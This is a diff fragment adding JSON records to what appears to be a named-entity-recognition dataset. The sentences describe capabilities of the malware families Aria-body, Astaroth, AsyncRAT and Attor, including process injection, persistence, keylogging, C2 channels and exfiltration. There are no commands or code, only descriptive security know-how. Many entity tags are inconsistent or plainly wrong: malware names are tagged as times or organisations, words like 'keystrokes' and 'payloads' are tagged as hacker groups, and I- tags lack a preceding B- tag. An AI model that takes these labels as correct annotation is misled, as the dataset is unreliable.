"O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "inject", + "itself", + "into", + "another", + "process", + "such", + "as", + "rundll32.exe", + "and", + "dllhost.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "used", + "an", + "encrypted", + "configuration", + "file", + "for", + "its", + "loader." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "delete", + "files", + "and", + "directories", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "gather", + "metadata", + "from", + "a", + "file", + "and", + "to", + "search", + "for", + "file", + "and", + "directory", + "names." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "download", + "additional", + "payloads", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "launch", + "files", + "using", + "<code>ShellExecute</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "used", + "TCP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "enumerate", + "loaded", + "modules", + "for", + "a", + "process.." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "use", + "a", + "reverse", + "SOCKS", + "proxy", + "module." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "established", + "persistence", + "via", + "the", + "Startup", + "folder", + "or", + "Run", + "Registry", + "key." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "capture", + "screenshots", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "identify", + "the", + "hostname,", + "computer", + "name,", + "Windows", + "version,", + "processor", + "speed,", + "machine", + "GUID,", + "and", + "disk", + "information", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "identify", + "the", + "location,", + "public", + "IP", + "address,", + "and", + "domain", + "name", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "gather", + "TCP", + "and", + "UDP", + "table", + "status", + "listings." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "identify", + "the", + "username", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "duplicate", + "a", + "token", + "from", + "ntprint.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "used", + "HTTP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Arp", + "can", + "be", + "used", + "to", + "display", + "a", + "host's", + "ARP", + "cache,", + "which", + "may", + "include", + "address", + "resolutions", + "for", + "remote", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Arp", + "can", + "be", + "used", + "to", + "display", + "ARP", + "configuration", + "information", + "on", + "the", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "collects", + "information", + "from", + "the", + "clipboard", + "by", + "using", + "the", + "OpenClipboard()", + "and", + "GetClipboardData()", + "libraries." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "has", + "obfuscated", + "and", + "randomized", + "parts", + "of", + "the", + "JScript", + "code", + "it", + "is", + "initiating." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "uses", + "ActiveX", + "objects", + "for", + "file", + "execution", + "and", + "manipulation." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "uses", + "an", + "external", + "software", + "known", + "as", + "NetPass", + "to", + "recover", + "passwords." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "can", + "launch", + "itself", + "via", + "DLL", + "Search", + "Order", + "Hijacking." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "can", + "store", + "C2", + "information", + "on", + "cloud", + "hosting", + "services", + "such", + "as", + "AWS", + "and", + "CloudFlare", + "and", + "websites", + "like", + "YouTube", + "and", + "Facebook." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "B-Org", + "O", + "B-Org" + ] + }, + { + "tokens": [ + "Astaroth", + "uses", + "a", + "fromCharCode()", + "deobfuscation", + "method", + "to", + "avoid", + "explicitly", + "writing", + "execution", + "commands", + "and", + "to", + "hide", + "its", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "has", + "used", + "a", + "DGA", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "has", + "used", + "an", + "XOR-based", + "algorithm", + "to", + "encrypt", + "payloads", + "twice", + "with", + "different", + "keys." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "exfiltrates", + "collected", + "information", + "from", + "its", + "r1.log", + "file", + "to", + "the", + "external", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "loads", + "its", + "module", + "with", + "the", + "XSL", + "script", + "parameter", + "<code>vShow</code>", + "set", + "to", + "zero,", + "which", + "opens", + "the", + "application", + "with", + "a", + "hidden", + "window." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "uses", + "certutil", + "and", + "BITSAdmin", + "to", + "download", + "additional", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "uses", + "JavaScript", + "to", + "perform", + "its", + "core", + "functionalities." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "logs", + "keystrokes", + "from", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "collects", + "data", + "in", + "a", + "plaintext", + "file", + "named", + "r1.log", + "before", + "exfiltration." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "has", + "used", + "malicious", + "files", + "including", + "VBS,", + "LNK,", + "and", + "HTML", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "can", + "abuse", + "alternate", + "data", + "streams", + "(ADS)", + "to", + "store", + "content", + "for", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "searches", + "for", + "different", + "processes", + "on", + "the", + "system." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "can", + "create", + "a", + "new", + "process", + "in", + "a", + "suspended", + "state", + "from", + "a", + "targeted", + "legitimate", + "process", + "in", + "order", + "to", + "unmap", + "its", + "memory", + "and", + "replace", + "it", + "with", + "malicious", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "creates", + "a", + "startup", + "item", + "for", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "can", + "be", + "loaded", + "through", + "regsvr32.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Astaroth", + "checks", + "for", + "the", + "presence", + "of", + "Avast", + "antivirus", + "in", + "the", + "<code>C:\\Program\\Files\\</code>", + "folder." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "uses", + "the", + "LoadLibraryExW()", + "function", + "to", + "load", + "additional", + "modules." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth's", + "initial", + "payload", + "is", + "a", + "malicious", + ".LNK", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "uses", + "a", + "software", + "packer", + "called", + "Pe123\\RPolyCryptor." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Astaroth", + "has", + "been", + "delivered", + "via", + "malicious", + "e-mail", + "attachments." + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "encodes", + "data", + "using", + "Base64", + "before", + "sending", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "can", + "check", + "for", + "Windows", + "product", + "ID's", + "used", + "by", + "sandboxes", + "and", + "usernames", + "and", + "disk", + "serial", + "numbers", + "associated", + "with", + "analyst", + "environments." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "collects", + "the", + "machine", + "name", + "and", + "keyboard", + "language", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "collects", + "the", + "external", + "IP", + "address", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "collects", + "the", + "timestamp", + "from", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "uses", + "an", + "external", + "software", + "known", + "as", + "NetPass", + "to", + "recover", + "passwords." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "has", + "used", + "malicious", + "VBS", + "e-mail", + "attachments", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "spawns", + "a", + "CMD", + "process", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "uses", + "WMIC", + "to", + "execute", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Astaroth", + "executes", + "embedded", + "JScript", + "or", + "VBScript", + "in", + "an", + "XSL", + "stylesheet", + "located", + "on", + "a", + "remote", + "domain." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AsyncRAT", + "can", + "use", + "the", + "`CheckRemoteDebuggerPresent`", + "function", + "to", + "detect", + "the", + "presence", + "of", + "a", + "debugger." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AsyncRAT", + "can", + "be", + "configured", + "to", + "use", + "dynamic", + "DNS." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "AsyncRAT", + "can", + "hide", + "the", + "execution", + "of", + "scheduled", + "tasks", + "using", + "`ProcessWindowStyle.Hidden`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "AsyncRAT", + "has", + "the", + "ability", + "to", + "download", + "files", + "over", + "SFTP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "AsyncRAT", + "can", + "capture", + "keystrokes", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AsyncRAT", + "has", + "the", + "ability", + "to", + "use", + "OS", + "APIs", + "including", + "`CheckRemoteDebuggerPresent`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AsyncRAT", + "can", + "examine", + "running", + "processes", + "to", + "determine", + "if", + "a", + "debugger", + "is", + "present." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AsyncRAT", + "can", + "create", + "a", + "scheduled", + "task", + "to", + "maintain", + "persistence", + "on", + "system", + "start-up." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AsyncRAT", + "has", + "the", + "ability", + "to", + "view", + "the", + "screen", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AsyncRAT", + "can", + "identify", + "strings", + "such", + "as", + "Virtual,", + "vmware,", + "or", + "VirtualBox", + "to", + "detect", + "virtualized", + "environments." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AsyncRAT", + "can", + "check", + "the", + "disk", + "size", + "through", + "the", + "values", + "obtained", + "with", + "`DeviceInfo.`" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AsyncRAT", + "can", + "check", + "if", + "the", + "current", + "user", + "of", + "a", + "compromised", + "system", + "is", + "an", + "administrator." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AsyncRAT", + "can", + "record", + "screen", + "content", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor", + "can", + "obtain", + "application", + "window", + "titles", + "and", + "then", + "determines", + "which", + "windows", + "to", + "perform", + "Screen", + "Capture", + "on." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor", + "encrypts", + "collected", + "data", + "with", + "a", + "custom", + "implementation", + "of", + "Blowfish", + "and", + "RSA", + "ciphers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Attor's", + "Blowfish", + "key", + "is", + "encrypted", + "with", + "a", + "public", + "RSA", + "key." + ], + "ner_tags": [ + "B-SamFile", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor", + "performs", + "the", + "injection", + "by", + "attaching", + "its", + "code", + "into", + "the", + "APC", + "queue", + "using", + "NtQueueApcThread", + "API." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Attor's", + "has", + "a", + "plugin", + "that", + "is", + "capable", + "of", + "recording", + "audio", + "using", + "available", + "input", + "sound", + "devices." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor", + "has", + "automatically", + "collected", + "data", + "about", + "the", + "compromised", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor", + "has", + "a", + "file", + "uploader", + "plugin", + "that", + "automatically", + "exfiltrates", + "the", + "collected", + "data", + "and", + "log", + "files", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor", + "has", + "a", + "plugin", + "that", + "collects", + "data", + "stored", + "in", + "the", + "Windows", + "clipboard", + "by", + "using", + "the", + "OpenClipboard", + "and", + "GetClipboardData", + "APIs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Strings", + "in", + "Attor's", + "components", + "are", + "encrypted", + "with", + "a", + "XOR", + "cipher,", + "using", + "a", + "hardcoded", + "key", + "and", + "the", + "configuration", + "data,", + "log", + "files", + "and", + "plugins", + "are", + "encrypted", + "using", + "a", + "hybrid", + "encryption", + "scheme", + "of", + "Blowfish-OFB", + "combined", + "with", + "RSA." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "I-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Attor", + "has", + "exfiltrated", + "data", + "over", + "the", + "C2", + "channel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor’s", + "plugin", + "deletes", + "the", + "collected", + "files", + "and", + "log", + "files", + "after", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor", + "has", + "used", + "FTP", + "protocol", + "for", + "C2", + "communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor", + "has", + "a", + "plugin", + "that", + "enumerates", + "files", + "with", + "specific", + "extensions", + "on", + "all", + "hard", + "disk", + "drives", + "and", + "stores", + "file", + "information", + "in", + "encrypted", + "log", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor", + "can", + "set", + "attributes", + "of", + "log", + "files", + "and", + "directories", + "to", + "HIDDEN,", + "SYSTEM,", + "ARCHIVE,", + "or", + "a", + "combination", + "of", + "those." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor", + "can", + "download", + "additional", + "plugins,", + "updates", + "and", + "other", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "One", + "of", + "Attor's", + "plugins", + "can", + "collect", + "user", + "credentials", + "via", + "capturing", + "keystrokes", + "and", + "can", + "capture", + "keystrokes", + "pressed", + "within", + "the", + "window", + "of", + "the", + "injected", + "process." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor", + "has", + "staged", + "collected", + "data", + "in", + "a", + "central", + "upload", + "directory", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor's", + "dispatcher", + "can", + "establish", + "persistence", + "via", + "adding", + "a", + "Registry", + "key", + "with", + "a", + "logon", + "script", + "<code>HKEY_CURRENT_USER\\Environment", + "\"UserInitMprLogonScript\"", + "</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Attor's", + "dispatcher", + "disguises", + "itself", + "as", + "a", + "legitimate", + "task", + "(i.e.,", + "the", + "task", + "name", + "and", + "description", + "appear", + "legitimate)." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor's", + "dispatcher", + "can", + "modify", + "the", + "Run", + "registry", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor", + "has", + "used", + "Tor", + "for", + "C2", + "communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor's", + "dispatcher", + "has", + "used", + "CreateProcessW", + "API", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor", + "has", + "a", + "plugin", + "that", + "collects", + "information", + "about", + "inserted", + "storage", + "devices,", + "modems,", + "and", + "phone", + "devices." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor's", + "dispatcher", + "can", + "inject", + "itself", + "into", + "running", + "processes", + "to", + "gain", + "higher", + "privileges", + "and", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor", + "has", + "opened", + "the", + "registry", + "and", + "performed", + "query", + "searches." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor's", + "installer", + "plugin", + "can", + "schedule", + "rundll32.exe", + "to", + "load", + "the", + "dispatcher." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor's", + "installer", + "plugin", + "can", + "schedule", + "a", + "new", + "task", + "that", + "loads", + "the", + "dispatcher", + "on", + "boot/logon." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor's", + "has", + "a", + "plugin", + "that", + "captures", + "screenshots", + "of", + "the", + "target", + "applications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor's", + "dispatcher", + "can", + "be", + "executed", + "as", + "a", + "service." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor's", + "dispatcher", + "can", + "execute", + "additional", + "plugins", + "by", + "loading", + "the", + "respective", + "DLLs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor", + "has", + "encrypted", + "data", + "symmetrically", + "using", + "a", + "randomly", + "generated", + "Blowfish", + "(OFB)", + 